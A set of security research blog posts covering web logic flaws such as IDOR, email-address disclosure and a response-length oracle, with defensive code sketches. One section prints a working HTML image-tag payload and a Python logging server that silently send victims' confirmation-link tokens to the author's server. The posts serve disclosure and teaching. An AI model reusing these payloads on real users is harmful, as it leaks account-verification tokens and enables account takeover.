Doppelgangers Week

Hey-O! How’s it going?

Today’s case-study is about a subject we’ve never really discussed before (well, maybe a little bit) – proper & secure database management.

So, databases. We all use them. SQL-based or not, we need some sort of non-volatile mechanism to save our data.
Whether you like it or not, SQL-based databases (MySQL, MS-SQL, etc.) are currently still the most used databases in the world, and a lot of companies use them as their main storage mechanism. Long live the Structured Query Language! (no ;-)

So – properly managing & controlling the database. I know, you’re thinking: “What the hell does this guy want? It’s so obvious to manage and control my DB!”. Shut up and read!
First, let’s talk business: I have seen “more than a few” companies that don’t know how to control their own database(s):
a. The database connection string is known to a lot of other mechanisms.
b. There is only one user – the root one – and every mechanism uses it.
c. Even if there are a few users – one for each mechanism – all of the users have basically the same permission set.
d. There are no DB backups. EVER!
e. And more horrifying things that I won’t say, because there might be children reading these lines, and it’s bed time.

The database is one of the most sacred mechanisms in the application. No matter what type of data it stores – it should be well treated.

A well-treated DB (Database)
First, let’s set things straight – a “well-treated DB” does not mean a “suffering-from-obesity DB”. This case-study will not discuss the type of DB collection your application should use, rules to keep from flooding your DB, or the advantages and disadvantages of using an SQL-based DB.
This article will highlight the risks of improperly handling your DB by showing you a real-life example, and will supply some fundamental guidelines to keep your application safer.

A very well-known real estate company, whose name we cannot disclose (and we respect their decision), suffered from some of the horrifying cases I described above: their connection string was known to a lot of mechanisms, they had only one, fully-privileged root user, and they didn’t have automatic periodic backups.

They had a main production DB with a few tables. The main table was ‘user’ – a table which, among other things, held the user ID, username (which was an email address) and salted password.

The email address was the user’s main identifier, and it could be changed/replaced by the user. The change took place immediately, and until the user clicked a confirmation link sent to the new email address he supplied, he wasn’t able to execute any “massive” action on the application, except for information fetches. Which means – the user was still able to see his own objects and data on the application.

So far so good – aside from the lack of awareness of the mentioned horrors (same CS, root user, no backups) – no SQL injection was possible, no CSRF was found, and the code was pretty well secured. Except for one thing – it was not possible to supply an already-existing email address when signing up, but it was possible to change an email address to an existing one.

“So what?”, “What’s the impact?”, you say.
Well, at first I also thought: meh, not much. But I was wrong. Very wrong.
When the DB had 2 rows with the same email address in the main table – it went crazy. Actions and data which were relevant to one email were relevant and visible to the other!

For example, the query to view all private assets which are related to that email looked very simple, like:

SELECT * FROM Assets WHERE EmailAddress = '<EMAIL_ADDRESS>';

And it returned private assets related to those TWO emails. An attacker could have changed his email to a victim’s and then leaked highly valuable, private data.

When the company and we examined the code, we understood that another mechanism was responsible for changing the email address – and it performed no checks at all. A simple mistake which could have led to a major disaster.
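To illustrate the missing check, here is a minimal sketch (the schema and names are hypothetical, not the company’s actual code): an email change is rejected if the address is already taken, and is stored as pending until the confirmation link is clicked.

```python
import sqlite3

def request_email_change(conn, user_id, new_email):
    """Stage an email change: reject duplicates, confirm before applying.
    Hypothetical schema: users(id, email, pending_email)."""
    cur = conn.execute(
        "SELECT 1 FROM users WHERE email = ? OR pending_email = ?",
        (new_email, new_email),
    )
    if cur.fetchone() is not None:
        raise ValueError("email address already in use")
    # Store as pending; the live 'email' column only changes after
    # the user clicks the confirmation link sent to new_email.
    conn.execute(
        "UPDATE users SET pending_email = ? WHERE id = ?",
        (new_email, user_id),
    )
    conn.commit()
```

With this in place, the duplicate-row scenario above simply cannot happen, no matter which mechanism calls it.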

So… give me your f-ing guidelines already!
This issue could have been easily prevented. The company agreed that this was a simple logic flaw. Maybe the programmer was tired. And the code reviewer(s). And the QA. I don’t know…
0. So the first guideline is to always drink coffee while writing such sensitive features. Or coke. Definitely not beer. Don’t ask.
1. The second one is to always have one and only one DB-managing mechanism. Write a simple, public & shared DB-wrapping mechanism that every other mechanism in your application has access to. Don’t have a DB util for each feature, and certainly don’t allow unrelated mechanisms to supply you the SQL query.
2. Don’t be naive. Check all user-supplied data for malicious characters. Integrate your existing sanitation engine into your DB-managing mechanism.
3. If you can – never delete something from the DB. Remember: restoring is harder than resetting. It is best to simply have an indication that a row is ‘inactive’ instead of deleting it from your DB. Don’t be cheap on space.
4. This one is pretty obvious: Don’t allow non-certified users to execute requests that influence the DB.
5. Have a periodic, 3rd-party service that backs up your DB every x hours. Provide this service a dedicated user with only SELECT privileges.
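As a rough illustration of guidelines 1–3, here is what a single shared DB-wrapping mechanism might look like (a simplified sketch, not production code): one access point, parameterized queries only, and soft deletes instead of real ones.

```python
import sqlite3

class DBWrapper:
    """Single shared DB access point (a hypothetical sketch):
    parameterized queries only, and rows are deactivated, never deleted."""

    def __init__(self, path=":memory:"):
        self.conn = sqlite3.connect(path)

    def query(self, sql, params=()):
        # Callers pass parameters separately -- never string-built SQL.
        return self.conn.execute(sql, params).fetchall()

    def soft_delete(self, table, row_id):
        # Guideline 3: mark inactive instead of DELETE, so data is restorable.
        if table not in {"users", "assets"}:   # allowlist of known tables
            raise ValueError("unknown table")
        self.conn.execute(f"UPDATE {table} SET active = 0 WHERE id = ?", (row_id,))
        self.conn.commit()
```

Every other feature in the application would go through this one class, never through its own ad-hoc DB util.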

Those 5 “golden” guidelines (and #5 is the most important, in my opinion) will ensure you won’t have a heart attack when things go wrong.
We’ll talk about having a Defibrillator later.

Unboxing

Hi there! Long time no see!
One of the reasons for our blackout, besides tons of vacations and hours of playing Far Cry Primal, was that we have been very busy exploring new ground in web & application research. Today we would like to present one of those new areas.

Our research in the past couple of months did not focus on XSS and other well-known P1 and P2 vulnerabilities. In fact, we wanted to focus on something new & exciting. You can call us Columbus. But please don’t.

So, “out-of-the-box” vulnerabilities. What are they? Well, by my definition, those are vulnerabilities that don’t have a known definition.
Today’s case-study is exactly one of those exciting new findings. This time, the research was not company-specific. It was method-specific.

Method-specific research?
It’s simple. I wasn’t looking for vulnerabilities in a certain company. I was looking for logic flaws in the way things are done in the most widely used communication methods.
Although the research produced some amazing findings in the HTTP protocol, those cannot be shared at the moment. But don’t you worry! There is enough to tell about our friend, the SMTP protocol, and the way it is used around the web.

In short, the SMTP protocol is widely used by millions of web applications to send email messages to clients. This protocol is very convenient and easy to use, and many companies have implemented it in their everyday work: swapping messages between employees, communicating with customers (notifications, etc.) and much more. But the most common use right now for SMTP (or simply for ‘sending mail’) is to verify user accounts.

One of SMTP features is that it allows sending stylish, pretty HTML messages. Remember that.

When users register to a certain web application, they immediately get an email which requires them to approve or to verify themselves, as a proof that this email address really belongs to them.

FeedBurner, for example, sends this kind of subscription confirmation email to users who subscribe to a certain feed. This email contains a link with an access token that validates that the email is indeed being used by the client. This email’s content is controllable by the feed owner, although the content must include a placeholder for the confirmation link: ‘$(confirmlink)’.

“SMTP allows sending HTML, so let’s send XSSs to users and party hard” – Not really. Although HTML is supported by SMTP, including malicious JavaScript tags, the web application’s XSS audit/sanitizer is responsible for curing the HTML that arrives over SMTP before parsing it and presenting it to the viewer.
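For the curious, here is a rough sketch of what such an allowlist sanitizer could look like, using Python’s standard html.parser (the allowed-tag list is hypothetical, not any vendor’s actual implementation): only harmless formatting tags survive, everything else is stripped and text content is escaped.

```python
import html as htmllib
from html.parser import HTMLParser

ALLOWED = {"a", "b", "u", "i", "p", "br"}  # hypothetical allowlist

class EmailSanitizer(HTMLParser):
    """Sketch of an allowlist sanitizer: keeps harmless formatting tags,
    drops everything else (script, event handlers, etc.)."""

    def __init__(self):
        super().__init__()
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED:
            # Drop all attributes for simplicity; a real sanitizer would
            # also allowlist attributes (e.g. href with safe schemes only).
            self.out.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Escape text so converted entities can't smuggle markup back in.
        self.out.append(htmllib.escape(data))

def sanitize(source):
    s = EmailSanitizer()
    s.feed(source)
    s.close()
    return "".join(s.out)
```

Note what this does and doesn’t do: it neutralizes script tags and attributes, but as the rest of this post shows, “safe” tags like `<a>` and `<img>` can still be abused.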

And that’s where I started to think: How can I hijack the verification link that users receive to their mail, without an XSS/CSRF and without, of course, breaking into their mail account? I knew that I can include a sanitized, non-malicious HTML code, but I couldn’t execute any JS code.

The answer was: Abusing the HTML in the SMTP protocol. Remember that non-malicious HTML tags are allowed? Tags like <a>, <b>, <u>.

In my FeedBurner feed, I simply added to the custom email template (of the subscription confirmation email) the following code:

<a href="https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)">Click here!!!</a>

And it worked. The users received an email with non-malicious HTML code. When they clicked the link, the confirmation link was logged on a server of mine.

I thought: “Cool, but user interaction is still required. How can I send this confirmation link to my server without any sort of user interaction, and without any JS event?” Well, the answer is incredible. I’ll use the one allowed tag that is loaded automatically when the page comes up: <img>!

By simply adding this code to the email template:

<img src="https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)" />

I was able to send the confirmation link to my server without any user interaction. I abused HTML’s automatic image-loading mechanism, and the fact that sanitized HTML could be sent over SMTP.
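For illustration, the attacker-side logging endpoint can be as small as this sketch (paths and port are hypothetical): when the victim’s mail client auto-loads the `<img>`, the confirmation link arrives as the `p` query parameter.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class TokenLogger(BaseHTTPRequestHandler):
    """Hypothetical endpoint behind /feedburner_poc/newentry."""

    def do_GET(self):
        # Everything after the first '?' is the query string, so the
        # embedded confirmation URL survives intact as the 'p' value.
        params = parse_qs(urlparse(self.path).query)
        token = params.get("p", ["<missing>"])[0]
        print("leaked confirmation link:", token)   # log it server-side
        # Answer 200 with an image content type so nothing looks odd.
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()

# To run the listener (blocking), one would do something like:
# HTTPServer(("0.0.0.0", 8080), TokenLogger).serve_forever()
```

The key detail is that `urlparse` splits at the first ‘?’, so a full confirmation URL (which itself contains ‘?’ and tokens) is captured whole.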

Google didn’t accept this submission. They said, and they are totally right, that the SMTP mail is sent by FeedBurner with a Content-Type: text/plain header, and therefore it is the email provider’s fault that it ignores this header and still parses the HTML, although it is being told not to.
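To see the header in question, here is a sketch using Python’s standard email module (addresses are made up): a plain string passed to set_content() yields exactly the text/plain content type FeedBurner declared, which a compliant mail client should render as raw text rather than as HTML.

```python
from email.message import EmailMessage

# Build a FeedBurner-style confirmation mail. Because set_content() is
# given a plain string, the message is declared text/plain -- a compliant
# client shows the raw <img> tag instead of loading it. The bug lived in
# clients that sniffed and rendered HTML despite this header.
msg = EmailMessage()
msg["Subject"] = "Confirm your subscription"
msg["From"] = "noreply@example.com"      # hypothetical addresses
msg["To"] = "victim@example.com"
msg.set_content('<img src="https://attacker.test/log?p=TOKEN" />')
```

An application that actually wants rendered HTML would instead call `msg.add_alternative(..., subtype="html")`; declaring text/plain and hoping is not a defense once clients start guessing.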

But still, this case-study was presented to you in order to see how everyday, “innocent & totally safe” features can be used to cause great harm.

Once Upon A Bit

Today’s case-study is pretty short – you are going to get its intention in a matter of seconds.
We are going to talk about observation, and about the slight difference between a no-bug to a major security issue.

Every security research project requires a respectful amount of attention and discernment. That’s why there are no successful industrial automatic security testers (excluding XSS testers) – machines cannot determine all kinds of security risks. As a matter of fact, machines cannot feel danger or detect it. There is no single way for security research to be conducted against a certain target. The research parameters differ and vary from target to target. Some research ends after a few years, some after a few days, and some after a few minutes. This case-study is of the last type. The described bug was so powerful and efficient (for the attacker) that no further research was needed in order to reach the goal.

A very famous company, which, among all the outstanding things it does, provides security consulting to a few dozen industrial companies and start-ups, asked us to test its “database” resistance. Our goal was to leak the names of the clients from a certain type of collection – not an SQL-driven one (we still haven’t got the company’s approval to publish its name or the type of vulnerable data collection).

So, after a few minutes of examining the queries which fetch information from the data collection, I understood that the name of the data row is required in order to perform a certain action on it. If the query issuer (= the user who requests the information about the row) has permission to see the results of the query – a 200 OK response is returned. If he doesn’t – again – a 200 OK response is returned.

At first I thought that this was correct behavior. Whether the information exists in the data collection or not – the same response is returned.
BUT THEN, completely by mistake, I opened the response for the non-existent data row in Notepad.

The end of the 200 OK response contained an unfamiliar UTF-8 char – one that shouldn’t have been there. The response for the non-existent data row request was longer by a single character!
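In other words, even though both cases return 200 OK, the body length itself becomes an oracle. A tiny sketch of the idea (the response bodies here are hypothetical):

```python
def row_exists(response_body, baseline_length):
    """Both requests return 200 OK; only the body length differs.
    A response longer than the known-good baseline means the row was
    NOT found (the memory-leak artifact got appended)."""
    return len(response_body) == baseline_length

# Hypothetical bodies: an existing/permitted row vs. a missing one
# with the stray character appended at the end.
baseline = len("{}")
leaked_body = "{}\ufffd"
```

An attacker only needs to record one known-good length, then compare every probe against it to enumerate which row names exist.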

At first, I was confused. Why does the response to a non-existent resource contain a weird character at the end of it?
I was sure there was JS code which checked the response and drew conclusions from that weird char – but there wasn’t.

This is one of the cases where I cannot fully explain the cause of the vulnerability, for a simple reason – I don’t see the code behind it.

The company’s response, besides total shock at our fast results, was that “apparently, when a non-existent resource is requested from the server, a certain sub-process which searches for this resource in the data collection fires up and encounters a memory leak. The result of the process, by rule, should be an empty string, but when the memory leak happens, the result is a strange character – the same one which is appended to the end of the response.”

Conclusion
Making your code run a sub-process, a thread or, god forbid, an external 3rd-party process is a very bad practice.
I know that sometimes it is more convenient and can save a lot of time, but whenever you use another process – you cannot fully predict its results. Remember – it can crash, freeze, or be force-closed by the OS or by some other process (anti-virus?).
If you must use a thread or sub-process, at least do it responsibly – make sure the OS memory isn’t full, and check the arguments you pass to the process, the process’s permission to run and its possible result scenarios. Don’t ever allow the process to run or execute critical commands based on user-input information.

Knocking the IDOR

Sorry for the no-new-posts November; FogMarks has been very busy exploring new fields and worlds. But now – we’re back on, baby!

Today’s case-study is about an old incident (and by “old” I mean 3 months old), but due to recent developments in active research into a very well-known company’s popular product, I want to present and explain the huge importance of having an Anti-IDOR mechanism in your application.

Intro

Basically, an IDOR (Insecure Direct Object Reference) allows an attacker to mess around with an object that does not belong to him. This could be the private credentials of users (like an email address), private object that the attacker should not have access to (like a private event), or public information that should simply and rationally not be changed (or viewed) by a 3rd-party.

When an attacker is able to mess around with an object that does not belong to him, the consequences can be devastating. I’m not just talking about critical information disclosure that could lead the business to the ground (like Facebook’s recent discoveries), I am also talking about messing around with objects that could lead the attacker to execute code on the server. Don’t be so shocked — it is very much possible.

From an IDOR to RCE

I’m not going to disclose the name of the company or software that this serious vulnerability was found on. I am not even going to say that this is a huge company with a QA and security response team that could fill an entire mall. Twice.
But, as you might have already guessed, gaining access to a certain object that you shouldn’t have had access to sometimes allows you to actually run commands on the server.

Although I can’t talk about that specific vulnerability, I am going to reveal my logic of preventing an IDOR from its roots.

Ideally speaking

An IDOR is prevented using an Anti-IDOR Mechanism (AIM). We at FogMarks developed one a few years ago, and, knock on wood, none of our customers has ever dealt with an IDOR problem. Don’t worry, we’re not going to offer to sell it to you. That mechanism was created only for two large customers who shared the same code base. Create your own mechanism with the info down below, jeez!
But seriously, AIM’s main goal is to AIM (get the word play?) the usage of a certain object only at the user who created it, or at the user(s) who have access to it.

This is done by storing that information in a database, especially for sensitive objects that could be targeted from web clients.
When an object is inserted into the DB, the mechanism generates a unique 32-character identifier for it. This identifier is only used by the server, and it’s called the “SUID” (Server Used ID). In addition, the mechanism issues a 15-digit integer identifier for the client side, called, of course, the “CUID” (Client Used ID). The CUID integer is derived from part of the 32-character SUID and part of the object’s details (like its name) using a special algorithm.

The idea of generating two identifiers for the same object is to avoid revealing the identifier of the actual sensitive object to the client side, so no direct access can be made in unexpected parts of the application.

Since object attributes tend to change (their names, for example), the CUID is replaced every once in a while, and the “heart” of the logic is to carefully match the CUID to the SUID.

The user’s permissions also include a list of nodes containing the SUIDs of the objects that the user has access to.

When the user issues a request from the client side – the algorithm tries to generate part of the SUID from the supplied CUID. If it succeeds, it tries to match that part to one of the SUIDs in the user’s permissions collection. If they match, the requesting user gets one-time, limited access to the object. This one-time access is enabled for x minutes and for one static IP, until the next process of matching a CUID to a SUID.
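The exact CUID/SUID algorithm obviously isn’t disclosed, but a sketch of the general idea might look like this (keyed HMAC truncation is my stand-in for the “special algorithm”; everything here is illustrative, not FogMarks’ actual code):

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # hypothetical server-side secret

def new_suid():
    """Server Used ID: 32-char identifier, never sent to the client."""
    return secrets.token_hex(16)       # 16 random bytes -> 32 hex chars

def cuid_for(suid):
    """Client Used ID: a 15-digit integer derived from the SUID.
    Without the server key, a client can't forge a CUID for a chosen SUID."""
    digest = hmac.new(SERVER_KEY, suid.encode(), hashlib.sha256).hexdigest()
    return int(digest, 16) % 10**15

def authorize(cuid, user_suids):
    """Match the supplied CUID against the SUIDs this user may access;
    return the matching SUID, or None for an IDOR attempt."""
    for suid in user_suids:
        if cuid_for(suid) == cuid:
            return suid
    return None
```

A CUID for an object outside the user’s permission list simply never matches, so the request dies inside the AIM instead of reaching the object.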

All of this process, of course, is managed by only one mechanism – the AIM.
The AIM handles requests in a queue, so when dealing with multiple parallel requests – the AIM might not be the perfect solution (due to the possibility that the object will be changed by two different users at the same time).

Conclusion

In order to keep your platform safe from IDORs, requests to access sensitive objects should be managed only by one mechanism.

You don’t have to implement the exact logic like I did and compile two different identifiers for the same object, but you should definitely manage requests and permissions to private objects in only one place.

FogMarks has found more IDORs of this kind in some very popular companies’ products (all patched since, of course).

Until next time!

Always use protection

 
In what way do you interact with the private information of your users? I mean information like their full name, email address, home address, phone number or any other kind of information that may be important to them, or that they’d rather keep private.

Today’s case-study talks just about that. Parental advisory: explicit content. Just kidding.

We will talk about the way private objects (and I’ll explain my interpretation of the term ‘objects’ later on) should be handled, and then we will see 2 neat examples from vulnerabilities I found on Facebook (which were fixed, of course).

OK, so you’re mature enough to ask your users to trust you with their email address, home address and phone number. If you are smart, you know that this type of information should be transmitted over the wire via HTTPS, but remember that sometimes it is also good practice to encrypt it yourself.

So your users’ info is properly transmitted and saved in the database, you assume that your DB is immune to SQL injections and other leakage incidents, and you are thinking of cracking open a beer and starting another episode of How I Met Your Mother.
Awesome! But first, I’d like to introduce you to another enemy: the IDOR.

Insecure Direct Object References are your information’s second-worst enemy (after SQLi, of course). An attacker who is able to access other users’ private objects (such as email addresses, phone numbers, etc.) could basically expose all of the private data on the server, without “talking” to the DB directly or running arbitrary code on the server.

This is the time to explain my definition of “private objects”. User objects are not just the user’s phone number, email address, name, gender, sexual orientation or favorite side of the bed. They are also objects that the user creates or owns, like the items in the user’s cart, a group the user is managing or a painting the user has drawn.

The best way to handle private objects is to define them as private and treat them with the appropriate honor.

If you know that only a certain user (or users) should be able to access a certain object, make sure that only those users’ IDs (or other unique identifiers) are able to access and mess with that object.

How will you do so?

Using a Private Object Manager (POM) of course.
The idea is simple: a one-and-only mechanism that will fetch or change information about private objects only if an accepted identifier has been provided.
For example: a class that will return the email address of user ID ‘212’ only if the ID of the user who requested that information is ‘212’.
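A minimal POM sketch along those lines (a toy in-memory store, purely illustrative):

```python
class PrivateObjectManager:
    """Sketch of a POM: the one-and-only gateway to private objects.
    Every fetch requires the requester's ID to match the object's owner."""

    def __init__(self):
        self._store = {}   # object_id -> (owner_id, data)

    def put(self, object_id, owner_id, data):
        self._store[object_id] = (owner_id, data)

    def get(self, object_id, requester_id):
        owner_id, data = self._store[object_id]
        if requester_id != owner_id:
            raise PermissionError("not the owner of this object")
        return data
```

The point is architectural, not algorithmic: as long as every code path in every version of the platform goes through `get()`, the ownership check cannot be forgotten in one forgotten corner.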

Sounds obvious, right?
Before posting this case-study I had a little chat with a colleague about the idea of creating a unique mechanism that will handle all requests to private objects.

He said that this is useless

“Because when a request is being made regarding a certain object, it is the job of the session manager to make sure that the currently active session is messing around with an object it has access to.”

But he was wrong. Very wrong.

Everyone knows Facebook events and groups. Everyone is part of a certain group on Facebook, or has gotten an invitation to a certain event.
Like any other feature of Facebook (and especially after the Cambridge Analytica data scandal), groups and events have different privacy levels. They can be public – then every user is able to see the event/group name and entire content; private – then every user is able to see the event/group name but not the content; or secret – then only users who were invited to join the group or participate in the event are able to see its name and content. A regular Facebook search does not discover the existence of such groups/events.

Almost every object on Facebook has an ID – usually a long number that represents that object in Facebook’s huge database – and so do groups and events.

So how can one determine the name or the content of a secret group or event?

I’ve spent a lot of time on the modern Facebook platform trying to fetch information from secret groups and events I cannot actually see, only by their ID.
But I couldn’t find any lead to disclose private information from secret objects. On Facebook’s modern platform. Modern.

And that’s when I started to think

Facebook has many versions of its web platform (and even of its mobile one).
Do they use the same Private Object Manager to access “sensitive” objects like a secret group or event?

No.

Immediately after I started to test the mbasic version of Facebook, I realized that things there work a little differently. OK, a lot differently.

I found 2 vulnerabilities which allowed the name of a secret group or event to be disclosed to any user, regardless of the fact that he is not invited to or a member of the group/event. The first vulnerability has already been disclosed, but the second one is yet to be fully patched (a fix is in progress these days).

Always use protection

Seriously, these vulnerabilities would have been prevented if Facebook had implemented a single Private Object Manager across all of its versions.
The idea of hoping that a session manager will prevent insecure access to an object is ridiculous, simply because some objects are so widely used (like Facebook groups with millions of members) that linking a user session to such an object is highly inefficient (and wrong).

Having a one and only filtering mechanism, a “condom”, to access the most important objects or details, is considered a best practice.

Cheers!

How Private Is Your Private Email Address?


After reading some blog posts about Mozilla’s Addons website, I was fascinated by this Python-based platform and decided to focus on it.
The XSS vector led basically nowhere. The folks at Mozilla did an excellent job curing and properly sanitizing every user input.

This led me to change my direction and search for the most fun vulnerabilities – logic flaws.

The logic
Most people don’t know this, but the fastest way to track down logic-based security issues is to get into the mind of the author and try to think from his point of view. That’s it. Look at a JS function – would you have written the same code? What would you have changed? Why?

Mozilla’s Addons site has a collections feature, where users can create custom collections of their favorite addons. That’s pretty cool, since users can invite other users to a role on their collection. How, you ask? By email address, of course!

A user types in the email address of another user, an AJAX request is made to an ‘address resolver’, and the ID of the user who owns this email address is returned.

When the user presses ‘Save Changes’, the just-resolved ID is passed to the server and then translated back into the email address, shown next to the user’s username. Pretty weird.

So, if the logic, for some reason, is to translate an email to an ID and then the ID back to an email, we can simply interrupt this process in the middle and replace the generated ID with the ID of another user.

The following video presents a proof of concept of this vulnerability, which exposed the email address of any addons.mozilla.org user.

Final Thoughts
It is bad practice to do the same operation twice. If you need something fetched from the server, fetch it once and store it locally (HTML5 localStorage, a cookie, etc.). This simple logic flaw jeopardized hundreds of thousands of users until it was patched by Mozilla.

The patch, as you guessed, was to send the email address to the server, instead of sending the ID.
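Conceptually, the patched flow removes the client-held ID entirely: the client submits the email address itself, and the server resolves it exactly once, at save time. A sketch (all names and data hypothetical):

```python
# Hypothetical user directory: email -> user ID, resolved server-side only.
USERS = {"alice@example.com": 101, "bob@example.com": 102}

def add_collaborator(collection, email):
    """Patched flow: a single, server-side resolution at save time.
    There is no intermediate client-held ID for an attacker to swap."""
    user_id = USERS.get(email)
    if user_id is None:
        raise LookupError("no such user")
    collection["collaborators"].append(user_id)
    return user_id
```

Since the only round trip carries the email the user actually typed, tampering with the request can at worst invite a user the attacker already knows the address of, which discloses nothing.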

Facebook Invitees Email Address Disclosure

Prologue

When Facebook was just a tiny company with only a few members, it needed a way to get more members.

Today, when you want more visitors to your site, you advertise on Facebook, because everybody is there.

Back then, the main advertising options were manually posting advertisements on popular websites (using Google, for instance), or getting your members to invite their friends using their email accounts.

Facebook’s Past Invitation System

When a user joined Facebook in its early days, there was literally nothing to see. Therefore, Facebook asked its members to invite their friends using an email invitation created by the registered user.

The user supplied his friends’ email addresses, and they received an email from Facebook saying that ‘Mister X is now on Facebook, you should join too!’.

Fun Part

As I came across this feature of Facebook I immediately started to analyze it.

I thought it would be nice to try and fool people that a user Y invited them to join, although the one who did it was the user X.

As I kept inviting people over and over again, I noticed something interesting: each invitation to a specific email address contained an invitation ID: ent_cp_id.

When clicking on ‘Invite to Facebook’, a small window pops up and shows the full email address of the invitee.

I wrote down the ent_cp_id of some email address I wanted to invite, and invited it once.

At this point I thought: “OK, I have invited this user; his ent_cp_id should not be accessible anymore.” But I was wrong. The ent_cp_id was still there. In fact, by simply retransmitting the HTTP request I could invite the same user again.

But the most interesting part of this vulnerability is the fact that any user could have seen the email address that was behind an ent_cp_id.

That means that anyone who was ever invited to Facebook via email was vulnerable to email address disclosure, because that invitation was never deleted and it was accessible to any user. All an attacker had to do next was randomly guess ent_cp_ids. As I said, old ent_cp_ids aren’t deleted, so the success rate is very high.

Conclusion

When you are dealing with sensitive information like email addresses, you should always limit the number of times an action can be performed. In addition, it is recommended to wipe any ID that might be linked to that sensitive information, or at least hash-protect it.
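A sketch of that recommendation (my illustration, not Facebook’s actual fix): invitation IDs as unguessable one-time tokens that are wiped on redemption.

```python
import secrets

class InviteStore:
    """Sketch: invitation IDs are unguessable random tokens, usable
    exactly once, and wiped immediately after use."""

    def __init__(self):
        self._pending = {}    # token -> invitee email address

    def create(self, email):
        token = secrets.token_urlsafe(32)   # ~256 bits: not enumerable
        self._pending[token] = email
        return token

    def redeem(self, token):
        # pop() deletes the mapping, so the email address can never be
        # looked up again through this token -- no disclosure, no re-invite.
        return self._pending.pop(token, None)
```

With sequential, never-expiring IDs the attacker only had to count upward; with 256-bit one-shot tokens, both the enumeration and the repeated lookups described above become impossible.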

Facebook quickly solved this issue and awarded a kind bounty.